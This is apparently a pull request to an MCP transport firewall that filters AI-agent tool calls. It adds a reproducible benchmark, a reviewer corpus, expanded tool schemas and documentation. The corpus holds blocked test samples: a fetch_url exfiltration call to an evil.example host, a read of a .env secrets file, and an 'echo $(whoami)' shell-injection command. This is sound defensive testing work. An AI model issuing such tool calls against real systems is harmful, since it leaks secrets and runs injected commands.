### PR TITLE
Add benchmark evidence and expand schema coverage

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this project will be documented in this file.
 
 The format is based on Keep a Changelog and the project follows semantic versioning.
 
+## [Unreleased]
+
+### Added
+
+- repeatable stdio evidence benchmark with a reviewer corpus and JSON output packet
+
+### Changed
+
+- expanded the strict schema registry across common read, write, list, search, execute, and fetch tool contracts
+- aligned HTTP and stdio paths around the same primary tool-invocation helper and alias-aware cache defaults
+- documented the benchmark methodology and supported schema families for external reviewers
+
 ## [2.1.1] - 2026-03-26
 
 ### Fixed

--- a/README.md
+++ b/README.md
@@ -12,6 +12,7 @@ The stdio runtime is the product boundary that matters most. The HTTP `/mcp` ser
 ## What To Read
 
 - evaluator walkthroughs: [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md)
+- evidence benchmark: [docs/EVIDENCE_BENCHMARK.md](docs/EVIDENCE_BENCHMARK.md)
 - threat model: [docs/THREAT_MODEL.md](docs/THREAT_MODEL.md)
 - reviewer guide: [docs/REVIEWER_GUIDE.md](docs/REVIEWER_GUIDE.md)
 - example payloads: [examples/README.md](examples/README.md)
@@ -22,7 +23,7 @@ The stdio runtime is the product boundary that matters most. The HTTP `/mcp` ser
 - per-tool scope checks before tool execution
 - color-boundary enforcement to block mixed trust domains and session color flips
 - preflight gates for high-trust (`blue`) actions
-- strict schema validation for registered tool contracts
+- strict schema validation for common file, directory, search, execute, and fetch contracts, including supported aliases
 - structured egress inspection for ShadowLeak-style exfiltration, sensitive path access, and shell-injection markers
 - response sanitization plus L1/L2 caching for allowlisted read-style tools
 - admin API and React dashboard for route, cache, rate-limit, circuit-breaker, preflight, and SIEM inspection
@@ -71,12 +72,27 @@ npm run verify:all
 npm run demo:stdio
 ```
 
+5. Run the repeatable benchmark and capture the reviewer packet.
+
+```bash
+npm run benchmark:stdio
+npm run benchmark:stdio -- --json > evidence.json
+```
+
 Expected demo outcomes:
 
 - an allowed `search_files` call reaches the target
 - the second identical `search_files` call is served from cache
 - a ShadowLeak-style `fetch_url` request is blocked with `SHADOWLEAK_DETECTED`
 - a request without `_meta.authorization` is blocked with `AUTH_FAILURE`
+
+Expected benchmark outcomes:
+
+- zero false positives across the allow corpus
+- zero false negatives across the blocked corpus
+- repeat invocations of cacheable allow cases return identical results
+- zero cache consistency failures across repeated allow cases
+- blocked cases report the expected denial codes
 
 ## Primary Runtime
 

--- a/docs/EVALUATOR_WALKTHROUGH.md
+++ b/docs/EVALUATOR_WALKTHROUGH.md
@@ -28,6 +28,8 @@ Expected evidence:
 - the `fetch_url` exfiltration sample returns `SHADOWLEAK_DETECTED`
 - the missing-auth sample returns `AUTH_FAILURE`
 
+For a repeatable measurement packet, also run [EVIDENCE_BENCHMARK.md](EVIDENCE_BENCHMARK.md) through `npm run benchmark:stdio`.
+
 ## Linux
 
 Shell commands:

--- a/docs/EVIDENCE_BENCHMARK.md
+++ b/docs/EVIDENCE_BENCHMARK.md
@@ -1,0 +1,59 @@
+# Evidence Benchmark
+
+This repository includes a repeatable stdio benchmark for external reviewers. The goal is not to prove perfect detection. The goal is to produce a reproducible packet with measurable `false positives`, `false negatives`, and cache behavior at the transport boundary.
+
+## What It Measures
+
+- allow corpus requests that should pass through the stdio firewall unchanged
+- blocked corpus requests that should fail closed with a specific denial code
+- repeatable cache behavior for allowlisted tools that are expected to stay deterministic
+- a JSON summary that can be compared across commits or releases
+
+## Canonical Command
+
+```bash
+npm run benchmark:stdio
+```
+
+The command builds the project, launches the stdio firewall, replays the benchmark corpus from [examples/evidence-corpus.json](../examples/evidence-corpus.json), and prints a summary plus a JSON report.
+
+For a machine-readable artifact:
+
+```bash
+npm run benchmark:stdio -- --json > evidence.json
+```
+
+## Corpus
+
+The benchmark corpus currently covers:
+
+- cacheable `search_files`
+- cacheable `read_file`
+- ShadowLeak-style `fetch_url` exfiltration
+- sensitive-path `read_file`
+- shell-injection `execute_command`
+- missing-authorization `search_files`
+- strict schema rejection for invalid `fetch_url`
+
+## Methodology
+
+- `allow` cases represent traffic that should pass through the stdio firewall with valid NHI authorization and a deterministic local target.
+- `false positive` means an `allow` case returned an error instead of reaching the target.
+- `cache consistency failure` means a repeated allow case returned a different result than the first response for the same payload.
+- `block` cases represent traffic that should fail closed before downstream execution. A `false negative` means the case either returned a result or returned the wrong denial code.
+- The corpus is intentionally small and reviewer-oriented. It is meant to be diffable across commits, not presented as exhaustive coverage of every MCP deployment.
+
+## Pass Criteria
+
+The benchmark passes when all of the following are true:
+
+- all allow corpus requests return a result
+- all repeated allow requests match the first response
+- all blocked corpus requests return the expected denial code
+- `cache consistency failures` is `0`
+- `false positives` is `0`
+- `false negatives` is `0`
+
+## Reviewer Use
+
+Use the benchmark output as an evidence packet. The JSON summary includes the corpus source, timestamps, verdict, per-case results, and blocked-code counts. That gives reviewers a stable artifact they can diff without reading the implementation first.

--- a/docs/REVIEWER_GUIDE.md
+++ b/docs/REVIEWER_GUIDE.md
@@ -4,16 +4,18 @@ This repository is easiest to evaluate as a reproducible fail-closed control, no
 
 ## Primary Path
 
-1. Read [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md).
+1. Read [EVALUATOR_WALKTHROUGH.md](EVALUATOR_WALKTHROUGH.md).
 2. Run `npm run verify:all`.
 3. Run `npm run demo:stdio`.
-4. Inspect the allowed and denied cases in `scripts/stdio-demo.mjs` and `tests/cli.test.ts`.
+4. Run `npm run benchmark:stdio`.
+5. Inspect the allowed and denied cases in `scripts/stdio-demo.mjs`, `scripts/stdio-benchmark.mjs`, and `tests/cli.test.ts`.
 
 ## Evidence Flow
 
 | Topic | Code | Evidence |
 |---|---|---|
 | stdio interception path | `src/cli.ts`, `src/stdio/proxy.ts` | `tests/cli.test.ts`, `scripts/stdio-demo.mjs` |
+| repeatable evidence benchmark | `scripts/stdio-benchmark.mjs`, `examples/evidence-corpus.json` | `EVIDENCE_BENCHMARK.md` |
 | fail-closed auth | `src/middleware/nhi-auth-validator.ts` | `tests/nhi-auth.test.ts`, `tests/cli.test.ts` |
 | scope enforcement | `src/middleware/scope-validator.ts` | `tests/scope-validator.test.ts` |
 | cross-tool boundary control | `src/middleware/color-boundary.ts` | `tests/color-boundary.test.ts` |
@@ -37,6 +39,12 @@ Use the evaluator walkthrough when you want:
 - transport-boundary evidence for the stdio runtime
 - a local target process that can be inspected directly
 - an attack path that fails before the target executes
+
+Use the benchmark when you want:
+
+- a repeatable false-positive and false-negative measurement
+- a JSON packet you can compare across commits
+- a corpus that covers both allowlisted and blocked tool calls
 
 ## Claims This Repo Supports Today
 

--- a/docs/THREAT_MODEL.md
+++ b/docs/THREAT_MODEL.md
@@ -51,6 +51,19 @@ All gates fail closed. If a gate cannot validate the request, the request is rej
 | ShadowLeak-style exfil via URL parameters | `ast-egress-filter` | `tests/ast-egress-filter.test.ts`, `tests/cli.test.ts` |
 | sensitive path access or shell-injection markers in arguments | `ast-egress-filter` | `tests/ast-egress-filter.test.ts` |
 
+## Supported Schema Registry
+
+The strict registry currently covers these contract families and aliases:
+
+- file reads: `read_file`, `read`, `open_file`
+- file writes and creation: `write_file`, `write`, `create_file`
+- directory enumeration: `list_directory`, `list_files`
+- content search: `search_files`, `search`
+- command execution: `execute_command`, `execute`
+- network fetch: `fetch_url`
+
+These names are not claimed as a universal MCP standard. They are the common tool contracts this repository enforces today.
+
 ## Operational Properties
 
 - blocked requests do not reach the downstream stdio target in the demo path

--- a/examples/README.md
+++ b/examples/README.md
@@ -3,9 +3,12 @@
 ## Stdio Demo
 
 - `demo-target.js`: local JSON-RPC tool server used by the stdio firewall demo and tests
-- `slow-stdio-target.js`: delayed target used to reproduce the shutdown race regression
+- `evidence-corpus.json`: reviewer benchmark corpus for false-positive and blocked-case measurement
+
+The delayed target used to reproduce the shutdown-race regression lives in `tests/fixtures/slow-stdio-target.js`, not in this directory.
 
 For the complete Windows and Linux evaluator path, see [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md).
+For the repeatable evidence packet, see [docs/EVIDENCE_BENCHMARK.md](../docs/EVIDENCE_BENCHMARK.md) and run `npm run benchmark:stdio`.
 
 Canonical reviewer path:
 

--- a/examples/evidence-corpus.json
+++ b/examples/evidence-corpus.json
@@ -1,0 +1,150 @@
+{
+  "name": "stdio-evidence-benchmark",
+  "description": "Repeatable reviewer corpus for fail-closed stdio evidence and false-positive measurement.",
+  "cases": [
+    {
+      "id": "allow-search-files-cache",
+      "kind": "allow",
+      "repeat": 2,
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.search_files"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "search_files",
+          "arguments": {
+            "query": "TODO"
+          }
+        }
+      }
+    },
+    {
+      "id": "allow-read-file-cache",
+      "kind": "allow",
+      "repeat": 2,
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.read_file"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "read_file",
+          "arguments": {
+            "path": "README.md"
+          }
+        }
+      }
+    },
+    {
+      "id": "block-shadowleak-fetch-url",
+      "kind": "block",
+      "expectedCode": "SHADOWLEAK_DETECTED",
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.fetch_url"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "fetch_url",
+          "arguments": {
+            "url": "https://evil.example/exfil?a=x&b=y&c=z"
+          }
+        }
+      }
+    },
+    {
+      "id": "block-sensitive-path-read-file",
+      "kind": "block",
+      "expectedCode": "SENSITIVE_PATH_BLOCKED",
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.read_file"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "read_file",
+          "arguments": {
+            "path": "/user/.env"
+          }
+        }
+      }
+    },
+    {
+      "id": "block-shell-injection-execute-command",
+      "kind": "block",
+      "expectedCode": "SHELL_INJECTION_BLOCKED",
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.execute_command"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "execute_command",
+          "arguments": {
+            "command": "echo $(whoami)"
+          }
+        }
+      }
+    },
+    {
+      "id": "block-missing-auth-search-files",
+      "kind": "block",
+      "expectedCode": "AUTH_FAILURE",
+      "auth": {
+        "type": "missing"
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "search_files",
+          "arguments": {
+            "query": "missing-auth"
+          }
+        }
+      }
+    },
+    {
+      "id": "block-schema-validation-fetch-url",
+      "kind": "block",
+      "expectedCode": "SCHEMA_VALIDATION_FAILED",
+      "auth": {
+        "type": "nhi",
+        "scopes": [
+          "tools.fetch_url"
+        ]
+      },
+      "request": {
+        "jsonrpc": "2.0",
+        "method": "tools/call",
+        "params": {
+          "name": "fetch_url",
+          "arguments": {
+            "url": "not-a-valid-url"
+          }
+        }
+      }
+    }
+  ]
+}

--- a/package-lock.json
+++ b/package-lock.json
@@ -15,7 +15,6 @@
         "zod": "^3.23.8"
       },
       "bin": {
-        "mcp-context-optimizer": "dist/cli.js",
         "mcp-transport-firewall": "dist/cli.js"
       },
       "devDependencies": {

--- a/package.json
+++ b/package.json
@@ -4,8 +4,7 @@
   "description": "Fail-closed stdio firewall for Model Context Protocol tool traffic",
   "main": "dist/cli.js",
   "bin": {
-    "mcp-transport-firewall": "dist/cli.js",
-    "mcp-context-optimizer": "dist/cli.js"
+    "mcp-transport-firewall": "dist/cli.js"
   },
   "type": "module",
   "engines": {
@@ -18,6 +17,7 @@
     "dev": "tsx watch src/index.ts",
     "dev:cli": "tsx src/cli.ts",
     "demo:stdio": "node scripts/stdio-demo.mjs",
+    "benchmark:stdio": "npm run build && node scripts/stdio-benchmark.mjs",
     "test": "node --experimental-vm-modules node_modules/jest/bin/jest.js",
     "typecheck": "tsc --noEmit",
     "verify:all": "npm run typecheck && npm run build && npm test && npm run demo:stdio && npm --prefix ui run build && npm --prefix ui run lint"

--- a/scripts/stdio-benchmark.mjs
+++ b/scripts/stdio-benchmark.mjs
@@ -1,0 +1,352 @@
+import fs from 'node:fs';
+import path from 'node:path';
+import readline from 'node:readline';
+import { spawn } from 'node:child_process';
+import { fileURLToPath } from 'node:url';
+
+const currentFilePath = fileURLToPath(import.meta.url);
+const currentDirPath = path.dirname(currentFilePath);
+const repoRoot = path.resolve(currentDirPath, '..');
+const cliPath = path.join(repoRoot, 'dist', 'cli.js');
+const targetPath = path.join(repoRoot, 'examples', 'demo-target.js');
+const corpusPath = path.join(repoRoot, 'examples', 'evidence-corpus.json');
+const proxyToken = process.env.PROXY_AUTH_TOKEN ?? '12345678901234567890123456789012';
+
+const argv = new Set(process.argv.slice(2));
+const jsonOnly = argv.has('--json');
+
+if (!fs.existsSync(cliPath)) {
+  console.error('Missing dist/cli.js. Run "npm run build" before "npm run benchmark:stdio".');
+  process.exit(1);
+}
+
+if (!fs.existsSync(corpusPath)) {
+  console.error('Missing examples/evidence-corpus.json.');
+  process.exit(1);
+}
+
+const corpus = JSON.parse(fs.readFileSync(corpusPath, 'utf8'));
+const cases = Array.isArray(corpus.cases) ? corpus.cases : [];
+const capturedStderrLines = [];
+
+if (cases.length === 0) {
+  console.error('No benchmark cases found in examples/evidence-corpus.json.');
+  process.exit(1);
+}
+
+const createAuthorization = (scopes) => {
+  return `Bearer ${Buffer.from(JSON.stringify({ token: proxyToken, scopes }), 'utf8').toString('base64')}`;
+};
+
+const createSession = () => {
+  const proxy = spawn(process.execPath, [cliPath, '--', process.execPath, targetPath], {
+    cwd: repoRoot,
+    env: {
+      ...process.env,
+      PROXY_AUTH_TOKEN: proxyToken,
+      MCP_ADMIN_ENABLED: 'false',
+    },
+    stdio: ['pipe', 'pipe', 'pipe'],
+  });
+
+  const stdoutReader = readline.createInterface({
+    input: proxy.stdout,
+    crlfDelay: Infinity,
+  });
+
+  const pendingResponses = [];
+  const stderrLines = [];
+  let closed = false;
+
+  proxy.stderr.on('data', (chunk) => {
+    stderrLines.push(chunk.toString());
+  });
+
+  stdoutReader.on('line', (line) => {
+    const pending = pendingResponses.shift();
+    if (!pending) {
+      return;
+    }
+
+    try {
+      pending.resolve(JSON.parse(line));
+    } catch (error) {
+      pending.reject(error);
+    }
+  });
+
+  proxy.on('exit', (code, signal) => {
+    while (pendingResponses.length > 0) {
+      const pending = pendingResponses.shift();
+      pending.reject(new Error(`stdio proxy exited early (code=${code}, signal=${signal})`));
+    }
+  });
+
+  const request = (message, timeoutMs = 5000) => {
+    return new Promise((resolve, reject) => {
+      const timer = setTimeout(() => {
+        reject(new Error(`Timed out waiting for response to request id=${message.id ?? 'null'}`));
+      }, timeoutMs);
+
+      pendingResponses.push({
+        resolve: (response) => {
+          clearTimeout(timer);
+          resolve(response);
+        },
+        reject: (error) => {
+          clearTimeout(timer);
+          reject(error);
+        },
+      });
+
+      proxy.stdin.write(JSON.stringify(message) + '\n');
+    });
+  };
+
+  const close = async () => {
+    if (closed) {
+      return;
+    }
+
+    closed = true;
+    proxy.stdin.end();
+    if (!proxy.killed) {
+      proxy.kill('SIGTERM');
+    }
+    stdoutReader.close();
+  };
+
+  return {
+    request,
+    close,
+    stderrLines,
+  };
+};
+
+const clone = (value) => {
+  return structuredClone(value);
+};
+
+const buildRequest = (benchmarkCase, requestId) => {
+  const message = clone(benchmarkCase.request);
+  message.id = requestId;
+
+  if (benchmarkCase.auth?.type === 'nhi') {
+    const scopes = Array.isArray(benchmarkCase.auth.scopes) ? benchmarkCase.auth.scopes : [];
+    message.params ??= {};
+    message.params._meta ??= {};
+    message.params._meta.authorization = createAuthorization(scopes);
+  }
+
+  return message;
+};
+
+const getErrorCode = (response) => {
+  return response?.error?.data?.code ?? response?.error?.code ?? null;
+};
+
+const runCaseInSession = async (session, benchmarkCase, requestIdStart) => {
+  const caseResult = {
+    id: benchmarkCase.id ?? `case-${requestIdStart}`,
+    kind: benchmarkCase.kind,
+    repeat: Number.isInteger(benchmarkCase.repeat) && benchmarkCase.repeat > 0 ? benchmarkCase.repeat : 1,
+    expectedCode: benchmarkCase.expectedCode ?? null,
+    requests: [],
+  };
+
+  let nextRequestId = requestIdStart;
+  let firstAllowSignature = null;
+
+  for (let iteration = 0; iteration < caseResult.repeat; iteration += 1) {
+    const message = buildRequest(benchmarkCase, nextRequestId);
+    nextRequestId += 1;
+
+    const response = await session.request(message);
+    const errorCode = getErrorCode(response);
+    const responseSignature = JSON.stringify(response?.result ?? null);
+
+    if (benchmarkCase.kind === 'allow') {
+      if (response?.error) {
+        caseResult.requests.push({
+          id: message.id,
+          status: 'false-positive',
+          errorCode,
+        });
+        continue;
+      }
+
+      if (iteration === 0) {
+        firstAllowSignature = responseSignature;
+        caseResult.requests.push({
+          id: message.id,
+          status: 'allow-primary',
+          response,
+        });
+        continue;
+      } else if (responseSignature !== firstAllowSignature) {
+        caseResult.requests.push({
+          id: message.id,
+          status: 'cache-miss',
+          response,
+        });
+        continue;
+      }
+
+      caseResult.requests.push({
+        id: message.id,
+        status: 'cache-hit',
+        response,
+      });
+      continue;
+    }
+
+    if (errorCode === benchmarkCase.expectedCode) {
+      caseResult.requests.push({
+        id: message.id,
+        status: 'blocked',
+        errorCode,
+      });
+      continue;
+    }
+
+    caseResult.requests.push({
+      id: message.id,
+      status: 'false-negative',
+      expectedCode: benchmarkCase.expectedCode ?? null,
+      errorCode,
+      response,
+    });
+  }
+
+  return caseResult;
+};
+
+const main = async () => {
+  const startedAt = new Date().toISOString();
+  const summary = {
+    benchmark: corpus.name ?? 'stdio-evidence-benchmark',
+    description: corpus.description ?? '',
+    source: path.relative(repoRoot, corpusPath),
+    startedAt,
+    finishedAt: null,
+    verdict: 'pending',
+    cases: [],
+    totals: {
+      cases: 0,
+      requests: 0,
+      allowedRequests: 0,
+      blockedRequests: 0,
+      cacheHits: 0,
+      cacheConsistencyFailures: 0,
+      falsePositives: 0,
+      falseNegatives: 0,
+    },
+    blockedByCode: {},
+  };
+
+  let nextRequestId = 1;
+
+  const allowCases = cases.filter((benchmarkCase) => benchmarkCase.kind === 'allow');
+  const blockCases = cases.filter((benchmarkCase) => benchmarkCase.kind !== 'allow');
+
+  const allowSession = createSession();
+  try {
+    for (const benchmarkCase of allowCases) {
+      const caseResult = await runCaseInSession(allowSession, benchmarkCase, nextRequestId);
+      nextRequestId += caseResult.requests.length;
+      summary.totals.cases += 1;
+      summary.cases.push(caseResult);
+
+      for (const requestResult of caseResult.requests) {
+        summary.totals.requests += 1;
+        summary.totals.allowedRequests += 1;
+
+        if (requestResult.status === 'false-positive') {
+          summary.totals.falsePositives += 1;
+        } else if (requestResult.status === 'cache-miss') {
+          summary.totals.cacheConsistencyFailures += 1;
+        } else if (requestResult.status === 'cache-hit') {
+          summary.totals.cacheHits += 1;
+        } else {
+          // primary allow response; no extra counters
+        }
+      }
+    }
+  } finally {
+    await allowSession.close();
+    capturedStderrLines.push(...allowSession.stderrLines);
+  }
+
+  const blockChunkSize = 3;
+  for (let index = 0; index < blockCases.length; index += blockChunkSize) {
+    const blockSession = createSession();
+    const chunk = blockCases.slice(index, index + blockChunkSize);
+
+    try {
+      for (const benchmarkCase of chunk) {
+        const caseResult = await runCaseInSession(blockSession, benchmarkCase, nextRequestId);
+        nextRequestId += caseResult.requests.length;
+        summary.totals.cases += 1;
+        summary.cases.push(caseResult);
+
+        for (const requestResult of caseResult.requests) {
+          summary.totals.requests += 1;
+          summary.totals.blockedRequests += 1;
+
+          if (requestResult.status === 'blocked') {
+            const code = requestResult.errorCode;
+            if (typeof code === 'string') {
+              summary.blockedByCode[code] = (summary.blockedByCode[code] ?? 0) + 1;
+            }
+          } else {
+            summary.totals.falseNegatives += 1;
+          }
+        }
+      }
+    } finally {
+      await blockSession.close();
+      capturedStderrLines.push(...blockSession.stderrLines);
+    }
+  }
+
+  summary.finishedAt = new Date().toISOString();
+
+  const failed = summary.totals.falsePositives > 0 ||
+    summary.totals.falseNegatives > 0 ||
+    summary.totals.cacheConsistencyFailures > 0;
+  summary.verdict = failed ? 'failed' : 'passed';
+
+  if (jsonOnly) {
+    console.log(JSON.stringify(summary, null, 2));
+  } else {
+    console.log(`${summary.benchmark} ${summary.verdict}`);
+    console.log(`source: ${summary.source}`);
+    console.log(`cases: ${summary.totals.cases}`);
+    console.log(`requests: ${summary.totals.requests}`);
+    console.log(`allowed: ${summary.totals.allowedRequests}`);
+    console.log(`blocked: ${summary.totals.blockedRequests}`);
+    console.log(`cache hits: ${summary.totals.cacheHits}`);
+    console.log(`cache consistency failures: ${summary.totals.cacheConsistencyFailures}`);
+    console.log(`false positives: ${summary.totals.falsePositives}`);
+    console.log(`false negatives: ${summary.totals.falseNegatives}`);
+    for (const [code, count] of Object.entries(summary.blockedByCode)) {
+      console.log(`blocked-by-code: ${code} x${count}`);
+    }
+    console.log(JSON.stringify(summary, null, 2));
+  }
+
+  if (failed) {
+    process.exitCode = 1;
+  }
+};
+
+try {
+  await main();
+} catch (error) {
+  const message = error instanceof Error ? error.stack ?? error.message : String(error);
+  console.error(message);
+  if (capturedStderrLines.length > 0) {
+    console.error(capturedStderrLines.join(''));
+  }
+  process.exitCode = 1;
+}

--- a/src/index.ts
+++ b/src/index.ts
@@ -14,7 +14,7 @@ import { scopeValidator } from './middleware/scope-validator.js';
 import { routeRequest } from './proxy/router.js';
 import { sanitizeResponse } from './proxy/shadow-leak-sanitizer.js';
 import { auditLog } from './utils/auditLogger.js';
-import { extractToolInvocations } from './utils/mcp-request.js';
+import { getPrimaryToolInvocation } from './utils/mcp-request.js';
 
 const DEFAULT_PORT = parseInt(process.env.PORT ?? process.env.MCP_PORT ?? '3000', 10);
 const DEFAULT_ADMIN_PORT = parseInt(process.env.MCP_ADMIN_PORT ?? '9090', 10);
@@ -57,7 +57,7 @@ app.post(
   async (req, res, next) => {
     try {
       const body = req.body as Record<string, unknown>;
-      const tool = extractToolInvocations(body)[0];
+      const tool = getPrimaryToolInvocation(body);
 
       if (!tool?.name) {
         res.status(400).json({
@@ -128,8 +128,8 @@ if (process.env.NODE_ENV !== 'test') {
       dbPath: DEFAULT_CACHE_DIR,
       ttlMs: DEFAULT_CACHE_TTL,
     },
-    alwaysCacheTools: ['read_file', 'list_directory', 'search_files'],
-    neverCacheTools: ['write_file', 'create_file', 'execute_command'],
+    alwaysCacheTools: ['read_file', 'read', 'open_file', 'list_directory', 'list_files', 'search_files', 'search'],
+    neverCacheTools: ['write_file', 'write', 'create_file', 'execute_command', 'execute'],
   });
 
   const adminPort = process.env.MCP_ADMIN_ENABLED === 'true' ? DEFAULT_ADMIN_PORT : 0;

--- a/src/mcp-tool-schemas.ts
+++ b/src/mcp-tool-schemas.ts
@@ -1,18 +1,90 @@
 import { z } from 'zod';
 
+const nonEmptyPath = z.string().min(1).max(1024).refine((value) => !value.includes('\0'), {
+  message: 'must not contain NUL bytes',
+});
+
+const nonEmptyCommand = z.string().min(1).max(512).refine((value) => !value.includes('\0'), {
+  message: 'must not contain NUL bytes',
+});
+
+const httpUrl = z.string().url().refine((value) => {
+  try {
+    const protocol = new URL(value).protocol;
+    return protocol === 'http:' || protocol === 'https:';
+  } catch {
+    return false;
+  }
+}, {
+  message: 'must use an http(s) URL',
+});
+
+const readFileSchema = z.object({
+  path: nonEmptyPath,
+  encoding: z.enum(['utf8', 'base64']).optional(),
+  maxBytes: z.number().int().min(1).max(1024 * 1024).optional(),
+}).strict();
+
+const writeFileSchema = z.object({
+  path: nonEmptyPath,
+  content: z.string().max(1024 * 1024 * 5),
+  encoding: z.enum(['utf8', 'base64']).optional(),
+  overwrite: z.boolean().optional(),
+}).strict();
+
+const createFileSchema = z.object({
+  path: nonEmptyPath,
+  content: z.string().max(1024 * 1024 * 5).optional(),
+  overwrite: z.boolean().optional(),
+}).strict();
+
+const listDirectorySchema = z.object({
+  path: nonEmptyPath,
+  recursive: z.boolean().optional(),
+  includeHidden: z.boolean().optional(),
+  maxDepth: z.number().int().min(1).max(32).optional(),
+  pattern: z.string().max(256).optional(),
+}).strict();
+
+const searchFilesSchema = z.object({
+  query: z.string().min(1).max(4096),
+  path: nonEmptyPath.optional(),
+  include: z.array(z.string().min(1).max(256)).max(20).optional(),
+  exclude: z.array(z.string().min(1).max(256)).max(20).optional(),
+  recursive: z.boolean().optional(),
+  maxResults: z.number().int().min(1).max(1000).optional(),
+}).strict();
+
+const executeCommandSchema = z.object({
+  command: nonEmptyCommand,
+  args: z.array(z.string().max(512)).max(50).optional(),
+  cwd: nonEmptyPath.optional(),
+  timeoutMs: z.number().int().min(100).max(300000).optional(),
+  env: z.record(z.string().max(1024)).optional(),
+}).strict();
+
+const fetchUrlSchema = z.object({
+  url: httpUrl,
+  method: z.enum(['GET', 'HEAD', 'POST']).optional(),
+  headers: z.record(z.string().max(2048)).optional(),
+  body: z.string().max(1024 * 1024).optional(),
+  timeoutMs: z.number().int().min(100).max(300000).optional(),
+}).strict();
+
 export const mcpToolSchemas = {
-  read_file: z.object({
-    path: z.string().max(1024),
-  }).strict(),
-  write_file: z.object({
-    path: z.string().max(1024),
-    content: z.string().max(1024 * 1024 * 5),
-  }).strict(),
-  execute_command: z.object({
-    command: z.string().max(512),
-    args: z.array(z.string().max(512)).max(50).optional(),
-  }).strict(),
-  fetch_url: z.object({
-    url: z.string().url().max(2048),
-  }).strict(),
-};
+  read_file: readFileSchema,
+  read: readFileSchema,
+  open_file: readFileSchema,
+  write_file: writeFileSchema,
+  write: writeFileSchema,
+  create_file: createFileSchema,
+  list_directory: listDirectorySchema,
+  list_files: listDirectorySchema,
+  search_files: searchFilesSchema,
+  search: searchFilesSchema,
+  execute_command: executeCommandSchema,
+  execute: executeCommandSchema,
+  fetch_url: fetchUrlSchema,
+} as const;
+
+export type McpToolSchemaRegistry = typeof mcpToolSchemas;

--- a/src/middleware/schema-validator.ts
+++ b/src/middleware/schema-validator.ts
@@ -29,24 +29,33 @@ export const validateSchema = (
 
       const schema = registry[toolName];
       if (schema) {
-        schema.parse(toolArgs);
+        try {
+          schema.parse(toolArgs);
+        } catch (error: unknown) {
+          if (error instanceof z.ZodError) {
+            const message = `Progressive Disclosure Violation: Tool "${toolName}" arguments failed strict schema validation. ${error.issues.map(i => `${i.path.join('.')}: ${i.message}`).join(', ')}`;
+
+            auditLogWithSIEM('SCHEMA_VALIDATION_FAILED', {
+              reason: message,
+              toolName,
+              ip,
+              path: requestPath,
+            });
+
+            throw new TrustGateError(
+              'Fail-Closed: Payload arguments rejected due to strict schema mismatch or prompt injection. Access Denied.',
+              'SCHEMA_VALIDATION_FAILED',
+              403
+            );
+          }
+
+          throw error;
+        }
       }
     }
   } catch (error: unknown) {
-    if (error instanceof z.ZodError) {
-      const message = `Progressive Disclosure Violation: Tool arguments failed strict schema validation. ${error.issues.map(i => `${i.path.join('.')}: ${i.message}`).join(', ')}`;
-
-      auditLogWithSIEM('SCHEMA_VALIDATION_FAILED', {
-        reason: message,
-        ip,
-        path: requestPath,
-      });
-
-      throw new TrustGateError(
-        'Fail-Closed: Payload arguments rejected due to strict schema mismatch or prompt injection. Access Denied.',
-        'SCHEMA_VALIDATION_FAILED',
-        403
-      );
+    if (error instanceof TrustGateError) {
+      throw error;
     }
 
     auditLogWithSIEM('INTERNAL_SERVER_ERROR', {

--- a/src/stdio/proxy.ts
+++ b/src/stdio/proxy.ts
@@ -15,7 +15,7 @@ import { validateSchema } from '../middleware/schema-validator.js';
 import { validateScopes } from '../middleware/scope-validator.js';
 import { mcpToolSchemas } from '../mcp-tool-schemas.js';
 import { auditLog } from '../utils/auditLogger.js';
-import { extractToolInvocations, isRecord } from '../utils/mcp-request.js';
+import { getPrimaryToolInvocation, isRecord } from '../utils/mcp-request.js';
 
 type JsonRpcId = string | number | null;
 
@@ -137,8 +137,8 @@ export class StdioFirewallProxy {
         dbPath: options.cacheDir ?? path.join(process.cwd(), '.mcp-cache'),
         ttlMs: (options.cacheTtlSeconds ?? 300) * 1000,
       },
-      alwaysCacheTools: options.alwaysCacheTools ?? ['read_file', 'list_directory', 'search_files'],
-      neverCacheTools: options.neverCacheTools ?? ['write_file', 'create_file', 'execute_command'],
+      alwaysCacheTools: options.alwaysCacheTools ?? ['read_file', 'read', 'open_file', 'list_directory', 'list_files', 'search_files', 'search'],
+      neverCacheTools: options.neverCacheTools ?? ['write_file', 'write', 'create_file', 'execute_command', 'execute'],
     });
   }
 
@@ -257,7 +257,7 @@ export class StdioFirewallProxy {
     try {
       await this.inspectRequest(message);
 
-      const tool = extractToolInvocations(message as unknown as Record<string, unknown>)[0];
+      const tool = getPrimaryToolInvocation(message as unknown as Record<string, unknown>);
       if (message.method === 'tools/call' && tool?.name && requestId !== null) {
         const cached = this.cacheManager.get(tool.name, tool.arguments ?? {});
         if (cached !== undefined) {
@@ -271,7 +271,6 @@ export class StdioFirewallProxy {
       }
 
       if (requestId !== null) {
-        const tool = extractToolInvocations(message as unknown as Record<string, unknown>)[0];
         this.pendingRequests.set(String(requestId), {
           toolName: tool?.name,
           cacheParams: tool?.arguments ?? message.params,

--- a/src/utils/mcp-request.ts
+++ b/src/utils/mcp-request.ts
@@ -59,6 +59,11 @@ export const extractToolInvocations = (body: Record<string, unknown>): McpToolIn
   return [];
 };
 
+export const getPrimaryToolInvocation = (body: Record<string, unknown>): McpToolInvocation | null => {
+  const invocations = extractToolInvocations(body);
+  return invocations[0] ?? null;
+};
